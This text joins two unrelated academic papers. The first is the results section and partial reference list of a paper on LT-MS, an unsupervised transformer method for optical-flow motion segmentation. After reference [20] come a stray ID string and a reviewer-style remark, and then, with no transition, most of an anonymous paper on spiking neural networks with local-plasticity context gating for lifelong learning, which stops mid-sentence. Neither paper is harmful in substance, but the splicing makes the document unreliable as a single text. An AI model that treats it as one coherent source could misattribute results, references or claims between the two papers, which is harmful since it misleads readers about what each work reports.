We report in Table 2 the results obtained by two versions of our LT-MS method on the three datasets DAVIS2016, SegTrackV2, and FBMS59. LT-MS-K2 performs segmentation with only two masks ($K = 2$), while LT-MS-K4 involves four masks ($K = 4$). Table 2 collects the results obtained by our LT-MS method and by other existing unsupervised methods, when available. We follow the categorization proposed in [21] regarding input and training. However, we have added a category w.r.t. the network input for four recent methods [6, 8, 16, 17] that only use RGB images as input at test time, the optical flow being involved only in the loss function. Evaluation is performed on the binary ground truth (foreground moving object vs background) for the three datasets. In the Appendix, we explain how we select the segments for the binary evaluation from the multiple motion segments delivered by our LT-MS method. We still put the OCLR method [33] in the category of unsupervised methods, whereas the authors of the DivA method [14] did not. Indeed, OCLR is not fully unsupervised, since it relies on human-annotated sprites to include realistic shapes in the computer-generated data used at training time. We consider the OCLR version taking only optical flow as input. The post-processing added to the CIS method [36], based on Conditional Random Fields (CRF), is a heavy one, which leads most authors to retain only the version without post-processing for a fair comparison. As shown in Table 2, our LT-MS method provides very convincing results, both for LT-MS-K2 and LT-MS-K4, in the category of unsupervised methods based on optical flow only. OCLR and DivA demonstrate better performance on the SegTrackV2 dataset. However, as aforementioned, OCLR is not a fully unsupervised method, while DivA leverages RGB images in its conditional decoder.
In addition, DivA, along with the MoSeg and CIS methods, takes multi-step flows as input, between $t$ and, in turn, $t+1$, $t+2$, $t-1$, $t-2$, and averages the four corresponding predictions to get the final result. SegTrackV2 includes sequences acquired with a poorly controlled handheld camera, which leads to unstable sequences where the contribution of our method is therefore less likely to be emphasized. Overall, temporal consistency is properly handled over long temporal periods by our LT-MS method. Beyond segmentation performance, we want to stress that our method is the only one providing by design a coherent segmentation over the sequence, which is a significant added value. Thus, we can claim that we have not only segmented the moving objects throughout the sequence, but also achieved some kind of tracking.

5.3 Multi-segment Evaluation

We have also performed the evaluation of multiple motion segmentation in a multi-segment setting. Since multiple-motion segmentation is harder than binary motion segmentation (moving foreground vs background), accuracy scores are expected to decrease for all methods. In Table 3, we report comparative results on the DAVIS2017-motion dataset and on FBMS59. As for the other methods, we performed segmentation with three masks. To this end, we finetuned the LT-MS-K4 network on the DAVIS2016 training set with now three masks ($K = 3$).

Table 2: Results obtained with two versions of our LT-MS method on DAVIS2016, SegTrackV2, and FBMS59. LT-MS-K2 performs segmentation with two masks ($K = 2$), and LT-MS-K4 involves four masks ($K = 4$). We include a comparison with unsupervised methods (scores from the cited articles). All scores correspond to evaluation on the binary ground truth. For LT-MS-K4 and LT-MS-K2, we report results obtained with a cut size of 10. Results with a cut size of 120 are given for LT-MS-K4 in Table 1, with very close performance (additional results on this point in the Appendix). The Jaccard index $J$ is the intersection over union between the extracted segments and the ground truth, while $F$ focuses on segment boundary accuracy. Performance is assessed by the average score over all samples for all datasets but DAVIS2016; for the latter, the overall score is given by the average of the sequence scores. *Actually, putting OCLR among the unsupervised methods can be questioned (see main text). †DivA somehow uses RGB input, since its conditional decoder leverages the input images.

| Method | Training | Input | DAVIS2016 | SegTrackV2 | FBMS59 |
|-----------------|--------------|-------------|-----------|-------------|--------|
| **Ours LT-MS-K4** | Unsupervised | Flow | 74.8 | 72.2 | 61.3 |
| **Ours LT-MS-K2** | | | 70.3 | 68.5 | 58.6 |
| ST-MS (4 masks) [22] | | | 73.2 | 70.3 | 55.0 |
| EM [21] | | | 69.3 | 70.7 | 55.5 |
| MoSeg [35] | | | 68.3 | 66.1 | 58.6 |
| FTS [25] | | | 55.8 | - | 47.8 |
| TIS$_0$ [10] | | | 56.2 | 45.6 | - |
| OCLR* [33] (flow only) | | | 72.1 | - | 67.6 |
| GWM [6] | | RGB (Flow in loss) | 79.5 | - | 78.3 |
| RCF [16] | | | 80.9 | - | 76.7 |
| AMD [17] | | | 57.8 | - | 57.0 |
| MOD [8] | | | 73.9 | - | 62.2 |
| DivA(4)† [14] | | RGB & Flow | 72.4 | - | 64.6 |
| TIS$_s$ [10] | | | 62.6 | 59.6 | - |
| CIS - No Post [36] | | | 59.2 | - | 45.6 |
| CIS - With Post [36] | | | 71.5 | - | 62.0 |

Table 3: Multi-segment evaluation. Regarding DAVIS2017-motion, $J \& F$ is the mean of the $J$ and $F$ scores. Evaluation is performed on the video as a whole, according to the official DAVIS2017 scheme. Reported scores are the average of the individual video scores. *See the caption of Table 2.
For FBMS59, the two evaluation metrics are the bootstrap IoU (bIoU) [14], where each ground-truth mask is mapped to the most likely predicted segment (performed at the frame level), and the linear assignment, a one-to-one mapping between the ground-truth and the predicted segments at the sequence level (similar to the official DAVIS2017 evaluation).

| Method / Scores | DAVIS2017-motion $J \& F$ ↑ | $J$ ↑ | $F$ ↑ | FBMS59 bIoU ↑ | Linear Assignment ↑ |
|------------------|-------------------|--------|--------|--------|--------|
| **Ours LT-MS-K3** | 42.2 | 39.3 | 45.0 | 58.4 | 47.2 |
| ST-MS [22] | 42.0 | 38.8 | 45.2 | - | - |
| MoSeg [35] | 35.8 | 38.4 | 33.2 | - | - |
| OCLR* [33] | 55.1 | 54.5 | 55.7 | - | - |
| DivA [14] | - | - | - | 42.0 | - |

The resulting performance on DAVIS2017-motion is slightly better than that of ST-MS [22], and far better than that of MoSeg. The same remark as before applies to the status of OCLR as an unsupervised method. Regarding FBMS59, we report multi-mask segmentation results with two different metrics. Our LT-MS method outperforms by a large margin DivA [14], which attempted this multi-segment evaluation on FBMS59.

5.4 Qualitative Visual Evaluation

Fig. 3 contains several visual results demonstrating how our LT-MS method behaves in different situations. We display three result samples obtained on different videos of the benchmarks. Additional results are provided in the Appendix. We can observe that the motion segments are globally accurate. Since our method involves several masks, we can properly handle articulated motions (people2, bmx), deal with the presence of several moving objects in the scene (people2), and separate

Figure 3: Results obtained with our LT-MS-K4 method ($K = 4$). Three groups of results are displayed: motocross-jump from DAVIS2016, people2 from FBMS59, and bmx from SegTrackV2. For each group, the first row samples successive flow fields (HSV color code) corresponding to the processed video. The second row contains the corresponding images of the video, where the ground truth of the moving object is overlaid in yellow (when available at that frame). The third row shows the motion segments provided by our LT-MS-K4 method, with one colour per segment. For all the results, we adopt the same color set for the three masks corresponding to the moving objects (blue, red, and orange), and we leave the background image for the background mask.

the rider from the bike or motorbike (bmx, motocross-jump), and accommodate motion parallax. Since our method enforces temporal consistency, it can also deal with errors in optical flow estimation or with objects that momentarily stop moving (bmx). We must keep in mind that our actual target is the optical-flow segmentation (OFS) task, even if we evaluate our method on VOS benchmarks. When VOS benchmarks deal with the segmentation of one primary object moving in the foreground, discrepancies with OFS may occur, which negatively impacts the evaluation scores. The segmentation of additional parts, which appears wrong w.r.t. the VOS ground truth, on the contrary makes sense from the OFS standpoint.

6 CONCLUSION

We have designed an original transformer-based unsupervised method for segmenting multiple motions over a video in one go. Our LT-MS method leverages the ELBO framework for the loss function, and fully acknowledges the temporal dimension of the motion segmentation problem.
Indeed, to the best of our knowledge, our method is the first unsupervised network-based OFS method explicitly leading to a stable and consistent OF segmentation throughout long video sequences. It introduces at training time, on the one hand, B-spline spatio-temporal parametric motion models over space-time volumes, and on the other hand, a loss term expressing temporal consistency over successive masks while taking care of occlusions. Our transformer-based network can be applied at test time to input volumes of any temporal length. It can accommodate different choices of the number $K$ of masks with a simple finetuning step. Experimental results demonstrate the efficiency and the accuracy of our LT-MS method, which provides competitive results on several datasets. In addition, it is very fast at test time. In future work, we will investigate the slot attention mechanism to modify the number of masks at test time without retraining the model.

REFERENCES

[1] G.K. Batchelor. *An introduction to fluid dynamics*. Cambridge University Press, 1967.

[2] D.J. Butler, J. Wulff, G.B. Stanley, and M.J. Black. A naturalistic open source movie for optical flow evaluation. In *European Conference on Computer Vision (ECCV)*, 2012.

[3] M. Caron, H. Touvron, I. Misra, H. Jégou, J. Mairal, P. Bojanowski, and A. Joulin. Emerging properties in self-supervised vision transformers. In *International Conference on Computer Vision (ICCV)*, October 2021.

[4] B. Cheng, A. G. Schwing, and A. Kirillov. Per-pixel classification is not all you need for semantic segmentation. In *Conference on Neural Information Processing Systems (NeurIPS)*, 2021.

[5] J. Cheng, Y.-H. Tsai, S. Wang, and M.-H. Yang. SegFlow: Joint learning for video object segmentation and optical flow. In *International Conference on Computer Vision (ICCV)*, Venice, 2017.

[6] S. Choudhury, L. Karazija, I. Laina, A. Vedaldi, and C. Rupprecht. Guess what moves: Unsupervised video and image segmentation by anticipating motion. In *British Machine Vision Conference (BMVC)*, London, 2022.

[7] A. Dave, P. Tokmakov, and D. Ramanan. Towards segmenting anything that moves. In *International Conference on Computer Vision Workshops (ICCVW)*, Seoul, 2019.

[8] S. Ding, W. Xie, Y. Chen, R. Qian, X. Zhang, H. Xiong, and Q. Tian. Motion-inductive self-supervised object discovery in videos. *arXiv:2210.00221*, October 2022.

[9] B. Duke, A. Ahmed, C. Wolf, P. Aarabi, and G. W. Taylor. SSTVOS: Sparse spatiotemporal transformers for video object segmentation. In *Conference on Computer Vision and Pattern Recognition (CVPR)*, 2021.

[10] B. Griffin and J. Corso. Tukey-inspired video object segmentation. In *IEEE Winter Conference on Applications of Computer Vision (WACV)*, Waikoloa Village, January 2019.

[11] K. Han, Y. Wang, H. Chen, X. Chen, J. Guo, Z. Liu, Y. Tang, A. Xiao, C. Xu, Y. Xu, Z. Yang, Y. Zhang, and D. Tao. A survey on vision transformer. *IEEE Transactions on Pattern Analysis and Machine Intelligence*, 45(1):87–110, January 2023.

[12] S.D. Jain, B. Xiong, and K. Grauman. FusionSeg: Learning to combine motion and appearance for fully automatic segmentation of generic objects in videos. In *Conference on Computer Vision and Pattern Recognition (CVPR)*, Honolulu, 2017.

[13] D.P. Kingma and M. Welling. An introduction to variational autoencoders. *Foundations and Trends in Machine Learning*, 12(4):307–392, 2019.

[14] D. Lao, Z. Hu, F. Locatello, Y. Yang, and S. Soatto. Divided attention: Unsupervised multi-object discovery with contextually separated slots.
*arXiv:2304.01430*, April 2023.

[15] F. Li, T. Kim, A. Humayun, D. Tsai, and J. M. Rehg. Video segmentation by tracking many figure-ground segments. In *International Conference on Computer Vision (ICCV)*, Sydney, 2013.

[16] L. Lian, Z. Wu, and S. X. Yu. Bootstrapping objectness from videos by relaxed common fate and visual grouping. In *Conference on Computer Vision and Pattern Recognition (CVPR)*, Vancouver, June 2023.

[17] R. Liu, Z. Wu, S. X. Yu, and S. Lin. The emergence of objectness: Learning zero-shot segmentation from videos. In *Conference on Neural Information Processing Systems (NeurIPS)*, 2021.

[18] F. Locatello, D. Weissenborn, T. Unterthiner, A. Mahendran, G. Heigold, J. Uszkoreit, A. Dosovitskiy, and T. Kipf. Object-centric learning with slot attention. In *Conference on Neural Information Processing Systems (NeurIPS)*, 2020.

[19] J. Mattheus, H. Grobler, and A. M. Abu-Mahfouz. A review of motion segmentation: Approaches and major challenges. In *International Multidisciplinary Information Technology and Engineering Conference (IMITEC)*, November 2020.

[20] N. Mayer, E. Ilg, P. Häusser, P. Fischer, D. Cremers, A. Dosovitskiy, and T. Brox. A large dataset to train convolutional networks for disparity, optical flow, and scene flow estimation. In *Conference on Computer Vision and Pattern Recognition (CVPR)*, Las Vegas, June 2016.
tzlGWqRA0T
For example, while “contextual signals” are mentioned and later modeled, the reader cannot know what that means with respect to this experiment without an initial explanation of the experimental setup and task(s).
SNN-LPCG: Spiking Neural Networks with Local Plasticity Context Gating for Lifelong Learning Anonymous authors Paper under double-blind review Abstract Humans learn multiple tasks in succession with minimal mutual interference, through the context gating mechanism of the prefrontal cortex (PFC). Brain-inspired spiking neural networks (SNNs) have drawn massive attention for their energy efficiency and biological plausibility. To overcome catastrophic forgetting when learning multiple tasks in sequence, current SNNs for lifelong learning focus on memory replay or regularization-based modification, while ignoring the cognitive control behavior of the brain. Inspired by the biological context-dependent gating mechanism found in the PFC, we propose SNNs with context gating trained by a local plasticity rule (SNN-LPCG) for lifelong learning. The iterative training between global and local plasticity for task units is designed to strengthen the connections between task neurons and hidden neurons and to preserve multi-task-relevant information. The experiments show that the proposed model is effective in maintaining past learning experience and has better task selectivity than other methods during lifelong learning. Our results provide new insights that the SNN-LPCG model is able to extend context gating with good scalability to different SNN architectures. Thus, our models have good potential for parallel implementation on neuromorphic hardware for real-life tasks. 1 Introduction The human brain can encode and preserve new memories continuously without disrupting previously acquired ones; that is, it has the ability of lifelong learning. It is believed that the primate prefrontal cortex (PFC) supports the cognitive control of selecting context-appropriate tasks and executing them with minimal interference by gating task-irrelevant input dimensions (Miller et al., 2001; Flesch et al., 2022). However, it remains unclear how synaptic plasticity induced by past experiences of old tasks is maintained when receiving new experiences of new tasks. Inspired by spike computation, network organization, and plasticity in the brain, spiking neural networks (SNNs) have exclusive advantages in energy efficiency and biologically plausible computation (Xu et al., 2022). However, affected by catastrophic forgetting, most current SNN agents need to learn samples of all tasks in a randomly mixed way in order to learn new tasks (Zhang et al., 2018; Xu et al., 2021), which is quite different from human multi-task lifelong learning. Hence, we aim to explore a possible solution that implements lifelong learning in SNNs with context gating induced by synaptic plasticity, to model human “cognitive control” behavior while minimizing manual intervention. The most essential point in lifelong learning is the capability to perform competitively on previous tasks after learning on subsequently observed datasets. However, vanilla SNNs trained with a surrogate gradient fail to learn multiple tasks in sequence without suffering from catastrophic forgetting, in which the performance decreases sharply on previously encountered tasks after learning new ones. To overcome that problem, SNNs for lifelong learning have been proposed based on memory replay (Mozafari et al., 2019), regularization (Skatchkovsky et al., 2022), or reward modulation (Allred & Roy, 2020).
But these models ignore the intrinsic cognitive control behavior the brain exhibits when proceeding with lifelong learning. In this paper, our goal is to implement context gating through local synaptic plasticity to solve lifelong learning for SNNs, and to explore whether SNNs could help understand and implement lifelong learning like the human brain. To this end, we develop the single-spike and multi-spike SNN-LPCG models, train them with human “cognitive control” experimental samples, and analyze the influence of local plasticity on the performance of the model and the possible reason behind it. The contributions are as follows: - The SNNs with context gating learned by local plasticity (SNN-LPCG) framework is proposed for lifelong learning, which can alleviate catastrophic forgetting to a certain extent via local-plasticity-induced context gating, instead of manually fixing weight updates or replaying samples that have already been learned. - The single-spike and multi-spike SNN-LPCG models are implemented with the local spike-timing-dependent plasticity (STDP) and Oja learning rules. The iterative training between global backpropagation and local plasticity is designed to strengthen the connections between task neurons and hidden neurons to preserve the multi-task-relevant information. - Experiments are conducted to analyze the reason for the effectiveness of local plasticity context gating during SNNs' lifelong learning. Besides, the behavior of the proposed model is compared with the characteristics of human behavior in the cognitive experiments; the results suggest that the two show a considerable degree of consistency. Moreover, the proposed model shows superior biological plausibility in terms of task neurons' selectivity in the neural dynamics. 2 RELATED WORKS Lifelong learning aims to remember previously trained old tasks and to acquire new knowledge by training on new tasks. Directly trained SNN models suffer from the catastrophic forgetting problem when proceeding with multi-task continuous training. Different approaches have been developed to overcome catastrophic forgetting. Regularization methods preserve the synaptic connections that are deemed essential to consolidate previous knowledge. Considering synaptic noise and Langevin dynamics, the regularization-based method for SNNs in Antonov et al. (2022) determines the importance of synaptic weights by stochastic Langevin dynamics with local STDP instead of gradients. In a Bayesian approach, each synaptic weight is represented by parameters that quantify the current epistemic uncertainty resulting from prior knowledge and observed data; the proposed online rules update the distribution parameters in a streaming fashion as data are observed (Skatchkovsky et al., 2022). Memory replay indicates that maintaining representative samples or anchors with the key features of previous tasks as episodic memory promotes lifelong learning. The SNNs trained by R-STDP in Mozafari et al. (2019) eliminate catastrophic forgetting with a small episodic memory. When the cortical connections between excitatory neurons are plastic and regulated by STDP, sleep has been shown to prevent catastrophic forgetting through spontaneous reactivation (replay) of both old and new memory traces. Other lifelong learning methods for SNNs have been proposed based on observed neuroscience mechanisms.
Inspired by the dopamine signals in mammalian brains, the controlled forgetting network model was introduced to address the stability-plasticity dilemma, with local STDP learning controlling the forgetting process and reducing the accuracy degradation on new tasks (Allred & Roy, 2020). In particular, context gating has been suggested to be effective in supporting lifelong learning. For instance, inspired by the fact that neurons in the PFC code for specific tasks and exert top-down control to prioritize context-appropriate stimuli and actions, a context-dependent gating signal provided along with the input was introduced in Masse et al. (2018) to guarantee that only sparse, mostly non-overlapping patterns of neurons are active for each task. In this method, between 80% and 86.7% of hidden units are gated on the MNIST dataset for peak classification accuracy. The optimal number of gated units depends on the network complexity and the number of tasks, and needs to be tuned by parameter validation. Moreover, these methods ignore the dynamic task selectivity of neuron populations during the cognitive control process.

Figure 1: The framework of the network construction of the single-spike SNN-LPCG and multi-spike SNN-LPCG. (Top) Two different kinds of learning regimes: blocked and interleaved. Humans learn better under a blocked curriculum when tasks are not similar. (left bottom) The network structure of the single-spike SNN-LPCG. The first encoding layer codes the input stimuli into spike trains and avoids ignoring weak signals. The additional context signals of the tasks are introduced into the second layer. Iterative training between global and local plasticity proceeds during the training process, in which all the synaptic weights are updated by the global backpropagation rule, and the weights of the context signal are updated by the local plasticity rule. (right bottom) The network structure of the multi-spike SNN-LPCG. The network is a simple feed-forward MLP with two hidden layers of IF spiking neurons, which receives the pixel information of the pictures together with the one-hot contextual signal as input; the connections between the contextual cue and the first layer are successively updated by the Hebbian learning rule. The panel also shows the blocked and interleaved distribution of the two tasks' samples.

3 METHODS

In this paper, we aim to explore the possibility of applying local plasticity, which can enhance the connection between the context input and the corresponding activated dendritic segments, to make SNNs achieve lifelong continual learning. As mentioned earlier, it is generally believed that human “cognitive control” is closely related to the PFC; there is evidence that the PFC can prioritize context-appropriate stimuli and actions through top-down control. In some past continual learning work, such as Duncker et al. (2020) and Zeng et al. (2019), the gated parameters are mostly updated by human coding or fixation, which lacks biological plausibility. Based on these considerations, we choose the spiking model as the basic framework for the design and construction of the target networks. The data from the relevant cognitive experiments of Flesch et al. (2018) (see the supplementary material for details) are used to analyze and evaluate the modeling ability and performance of the proposed model.
3.1 NETWORK ARCHITECTURE

In the above experiment, participants need to classify the input stimuli according to the given task rules. We model this behavior with three-layer MLP spiking neural networks, in which the main part of the network receives the picture stimuli and outputs the results, while the contextual signals are encoded as one-hot labels and then input into the network so as to affect the network's judgment. We use local plasticity to reinforce the connection between the context inputs and the relevant features. Based on different spike coding methods, we develop SNN-LPCG on top of two different kinds of SNNs: multi-spike SNNs trained with the surrogate gradient, and single-spike SNNs with direct backpropagation. Both SNNs use stochastic gradient descent (SGD) to train on blocked or interleaved data. Once a supervised training step is finished, the network follows with a step (in some trials more than one) of local plasticity learning.

### 3.1.1 Single-Spike SNN-LPCG

We employ the basic SNN model in Mostafa (2018), where each neuron is permitted to fire only once. The non-leaky IF neuron model is utilized for its simplicity and efficiency. The membrane potential of each postsynaptic neuron \( j \) is obtained after integrating the contributions of all the \( N_I \) weighted presynaptic neurons:

\[
V_j(t) = \sum_{i=1}^{N_I} g(t - t_i)\, w_{ij}\, (1 - \exp(-(t - t_i))),
\]

where \( g(x) \) denotes the Heaviside function, which equals zero for negative arguments \( x \) and one for positive ones. \( t_i \) indicates the firing time of presynaptic neuron \( i \). Thus, presynaptic neuron \( i \) transmits the corresponding postsynaptic potential to neuron \( j \) only if \( t_i < t \); otherwise, that potential vanishes. The postsynaptic neuron \( j \) emits a spike when its membrane potential crosses the threshold \( V_{th} \), which is set to 1. Since each neuron is permitted to fire only once, the spike firing time \( t_j \) is transformed to the \( z \)-domain by \( \exp(t_j) \rightarrow z_j \) to simplify the implementation. Meanwhile, the causal set \( C_j = \{ i : t_i < t_j \} \) is defined as the collection of presynaptic spikes that determine the time point at which the postsynaptic neuron fires its first spike. The firing times of each neuron can then be computed sequentially over the feedforward process through the above formulation.

In the experimental process, we found that directly using the single-spike structure in Mostafa (2018) easily makes the network ignore relatively weak signals (that is, the darker pixels) in the source visual stimulus. Therefore, we apply an MLP structure at the first layer to extract the features of the source image. The hidden layer then encodes the extracted features (with values limited by a sigmoid function) together with the contextual signal, according to their signal strength, for forward propagation. Besides, to strengthen the difference in STDP's influence on different synapses, we encode the stronger contextual signal with the same intensity as the strongest signals in the hidden layer during the Hebbian update. We also adjust the number of weight updates of global plasticity and of local plasticity within a round, in order to coordinate the strength between them.
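As an illustration of these single-spike dynamics (not the authors' implementation, which solves for the firing times analytically in the z-domain), a brute-force NumPy sketch that finds each neuron's first threshold crossing on a discrete time grid could look as follows; all names and the grid resolution are our assumptions.

```python
import numpy as np

V_TH = 1.0  # firing threshold, as in the membrane-potential equation above

def first_spike_times(t_in, w, t_grid):
    """First spike time of each postsynaptic non-leaky IF neuron.

    t_in:   (N_in,) presynaptic spike times (each neuron fires once)
    w:      (N_in, N_out) synaptic weights
    t_grid: (T,) increasing time points at which the threshold is tested
    Returns (N_out,) spike times; np.inf marks neurons that never fire."""
    t_out = np.full(w.shape[1], np.inf)
    for t in t_grid:
        dt = t - t_in                                      # (N_in,)
        # Heaviside-gated exponential PSP kernel of the equation above
        psp = (dt > 0) * (1.0 - np.exp(-np.maximum(dt, 0.0)))
        v = psp @ w                                        # (N_out,) potentials
        newly = (v >= V_TH) & np.isinf(t_out)              # crossing now, not fired yet
        t_out[newly] = t                                   # fire once, then lock
    return t_out

# usage sketch: t_hidden = first_spike_times(t_input, w1, np.linspace(0.0, 10.0, 1000))
```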
**Context gates by STDP.** The local plasticity of STDP is a reasonably well-established physiological mechanism of activity-driven synaptic regulation based on locally adjacent neurons. It has been observed extensively in vitro for more than a decade (Feldman, 2000), and it is believed to play an important role in neural activity (Masquelier et al., 2009).

\[
\Delta W_{ij}^{\text{stdp}} = \begin{cases} A_+\exp\left(-\frac{t_j-t_i}{\tau^+}\right), & \text{if } t_j > t_i, \\ A_-\exp\left(-\frac{t_i-t_j}{\tau^-}\right), & \text{if } t_j \le t_i, \end{cases}
\]

where \( A_+, A_- \) and \( \tau^+, \tau^- \) indicate the magnitudes and time constants, respectively. Thus, \( w_{ij} \) is updated by \( w_{ij} = w_{ij} + \lambda_{\text{stdp}} \cdot \Delta W_{ij}^{\text{stdp}} \).

**Loss function.** Since the modeled behavior is a binary classification task, we use a simplified cross-entropy to compute the loss. Besides, we multiply the loss value by the reward value, as the participants received a numerical reward after their decisions in the cognitive experiments:

\[
L_{\text{single}} = -r \times \frac{\exp(-o_0)}{\exp(-o_0) + \exp(-o_1)},
\]

where \( r \) is the numerical reward of the trial, and \( o_0, o_1 \) are the spike latencies of the last layer.

3.1.2 Multi-spike SNN-LPCG

The global training of the multi-spike SNN-LPCG model is implemented with the spatio-temporal backpropagation (STBP) algorithm of Wu et al. (2018). The iterative integrate-and-fire (IF) neuron is employed to express neuronal dynamics in both the spatial and temporal domains. According to the integrated presynaptic input and the membrane potential at time \( t \), the membrane potential of postsynaptic neuron \( i \) in layer \( n \) at time \( t+1 \) is computed as:

\[
u_i^{t+1,n} = u_i^{t,n} + x_i^{t+1,n} + b_i,
\]
\[
x_i^{t+1,n} = \sum_{j=1}^{l(n-1)} w_{ij}^n o_j^{t+1,n-1},
\]
\[
o_i^{t+1,n} = g(u_i^{t+1,n} - V_{th}).
\]

The Heaviside function \( g(x) \) guarantees that a spike fires once the membrane potential crosses the threshold \( V_{th} \). The surrogate gradient of \( g(x) \) is then approximated by the derivative \( g'(x) = \frac{\alpha}{2(1+(\frac{x}{\alpha})^2)} \), to solve the non-differentiability of the discrete spike firing behavior, where \( \alpha \) is set to 2.0. Based on the above formulation and the gradient computation in Wu et al. (2018), the update of the synaptic weights is obtained by gradient descent.

During the experiments, we found that the STDP learning rule was of very little benefit in the multi-spike model. We infer that this is because the positive contextual signal is strong and is encoded at a relatively high firing rate in the multi-spike network; the local plasticity learned by STDP then becomes unstable, which makes it difficult for the STDP rule to help the network distinguish functional neurons. Therefore, we do not apply the STDP rule as the local plasticity rule of the multi-spike model.

**Oja's rule.** Inspired by Flesch et al. (2022), we use Oja's rule (Oja, 1982), which regularizes the weights based on Hebbian learning, to constrain the parameters:

\[
w \leftarrow w + \eta_{hebb}\, y\, (x - y\, w),
\]

where \( \eta_{hebb} \) is the learning rate of the Hebbian update, \( x \) is the input, and \( y \) is the output of the linear hidden units connected to the input \( x \) via the weight matrix \( w \).
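The two local updates above can be sketched compactly; this NumPy fragment is our illustration only, with placeholder magnitudes, learning rates, and matrix shapes (a negative \( A_- \) encodes depression in the STDP rule).

```python
import numpy as np

def stdp_update(w, t_pre, t_post, a_plus=0.1, a_minus=-0.1,
                tau_plus=10.0, tau_minus=10.0, lam=0.01):
    """Pairwise STDP applied to the context-to-hidden weights.

    t_pre:  (N_pre,) spike times of the context input neurons
    t_post: (N_post,) spike times of the hidden neurons
    Potentiation when the presynaptic spike precedes the postsynaptic
    one (t_post > t_pre), depression otherwise."""
    dt = t_post[None, :] - t_pre[:, None]        # (N_pre, N_post) timing differences
    dw = np.where(dt > 0,
                  a_plus * np.exp(-np.abs(dt) / tau_plus),
                  a_minus * np.exp(-np.abs(dt) / tau_minus))
    return w + lam * dw                          # w_ij += lambda_stdp * dW_ij

def oja_update(w, x, y, eta=0.01):
    """Oja's rule: Hebbian growth with an implicit weight-decay term.

    x: (N_pre,) presynaptic (context) activity
    y: (N_post,) postsynaptic activity of the linear hidden units"""
    return w + eta * (np.outer(x, y) - (y ** 2) * w)
```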
**Sluggish neurons.** According to common knowledge and the conclusions from experiments with human volunteers (Flesch et al., 2018), humans usually learn tasks better after blocked training than after interleaved training, while artificial neural networks usually show the opposite. Inspired by Flesch et al. (2022), we apply "sluggish" neurons to model the human learning bias under interleaved training. That is, when learning in the interleaved mode, the relations between the context cues and the stimuli of former samples may interfere with the judgment of the current sample. The sluggish neurons carry over information from previous samples.

By simply using Hebbian learning rules and SNNs, we can not only achieve basic cognitive control in the blocked learning regime, but also obtain stronger task-specific neural codes, owing to the detailed neural dynamics, compared with artificial neural networks.

4 RESULTS

In this section, we conduct several experiments to validate the effectiveness and the biological plausibility of our method. Grid search is employed to find suitable parameters for each model. The final results are obtained by running each network three times and averaging the results for comparison.

Figure 2: (A) The accuracy curves of single-spike SNN-LPCG. (left) Vanilla single-spike SNN. (mid) Vanilla network with the STDP learning rule. (right) Vanilla network with multiple STDP updates. (B) (left top) The target choice for the given data. (other) The choices of the trained network with (right top) the vanilla setting, (left bottom) the STDP learning rule, and (right bottom) multiple STDP updates. (C) (left top) The average absolute values of the weights related to the context signal input and of the other weights in the hidden layer of the three networks. (other) The spike-time differences of hidden-layer neurons of a trained network under the two different contextual signals, for the vanilla network (right top), the network with the STDP learning rule (left bottom), and the network with multiple STDP updates (right bottom).

4.1 THE EFFECTIVENESS OF SINGLE-SPIKE SNN-LPCG LOCAL PLASTICITY WITH STDP

We first explore how STDP may take effect during context-dependent task learning. As illustrated in Fig. 2(A), and as expected, we note that the single-spike SNN is also affected by catastrophic forgetting: the learning performance on the first task drops almost immediately. In contrast, when applying the STDP learning rule, the decline of the first task's performance is restrained to a very slow rate, and the performance on the second task still rapidly increases until converging to perfect performance. The accuracy on the first task finally settles at roughly 75%. In addition, the model with multiple STDP updates seems to have stronger resistance to catastrophic forgetting, though its results are relatively unstable. However, although the memory decline decelerates under the effect of STDP, the accuracy curve of the first task becomes even more unstable than that of the vanilla network.

We then compare the average absolute values of the weights related to the context signal and of the other weights in the hidden layer of the three models. As shown in Fig. 2(C) (left top), under the influence of the STDP learning rule, the absolute values of the context-related weights become very large.
Besides, after training on the blocked data, the spike-time differences of the hidden-layer neurons between the two tasks are very small (mostly below 0.05 ms; the largest is only ~0.3 ms) and evenly distributed, so the choice matrix of the first task is almost replaced by that of the second. In contrast, the hidden-layer neurons of the network using the STDP learning rule always fire earlier under the first task than under the second, which enables the network to distinguish the two independent tasks to a certain extent.

Based on these phenomena, we infer that the relatively large weight magnitudes caused by the STDP learning rule enable the network to retain some cognition of past tasks, so that it can make correct choices for relatively strong stimuli after being trained on the second task. This is also reflected in Fig. 2(B) (bottom): the choice matrix of the first task changes smoothly along the areas where the choices are consistent under the two tasks. The large weight magnitudes might also be the main reason for the instability of the accuracy curve on the first task.

Though it has a certain effect, the stability and the final performance of the model using the STDP learning rule in context-dependent tasks are still not satisfactory. The neural dynamics of the brain are constructed by a large group of neural plasticity mechanisms (Churchland et al., 2012; Ahrens et al., 2012; Golub et al., 2018). The exploration and findings of single-spike SNN-LPCG might provide ideas for related research fields. Based on the problems of the single-spike model, we further explore multi-spike SNN-LPCG, which implements a more stable and better model of human cognitive control behavior and has better biological plausibility.

Figure 3: (A) (upper) The accuracy curves of vanilla blocked training (left), applying the OWM learning algorithm to the latter two connections (mid), and our method (right). (bottom left) Applying the OWM learning algorithm to all the connections. (bottom right) The standard reward value of the whole task and the choices of the trained network in two dimensions, for the vanilla blocked-training network (left two), the network with OWM applied in the latter two layers (mid two), and the network trained with our method (right two). (B) The impact of the sluggish neurons in the context-dependent decision-making task. (left top) The accuracy of neural networks trained on interleaved data (left) or blocked data (right) with different levels of "sluggishness". (right top) The proportion of units in the hidden layer that are task selective (obtained by linear regression). (left bottom) Linear coefficients obtained from a regression of the output against the models shown in the middle. (mid bottom) The two models used to model the possible choices of humans: the factorized model means the two features are learned separately, while the linear model means the two features are learned chaotically, ignoring the context cue. (right bottom) The network output for different levels of sluggishness.

4.2 COMPARING MULTI-SPIKE SNN-LPCG WITH HUMAN MODIFICATION

To validate the effectiveness of multi-spike SNN-LPCG, we compare it to other lifelong learning methods under the same setting, such as the regularization-based orthogonal weights modification (OWM) learning algorithm of Zeng et al. (2019). As shown in Fig. 3(A),
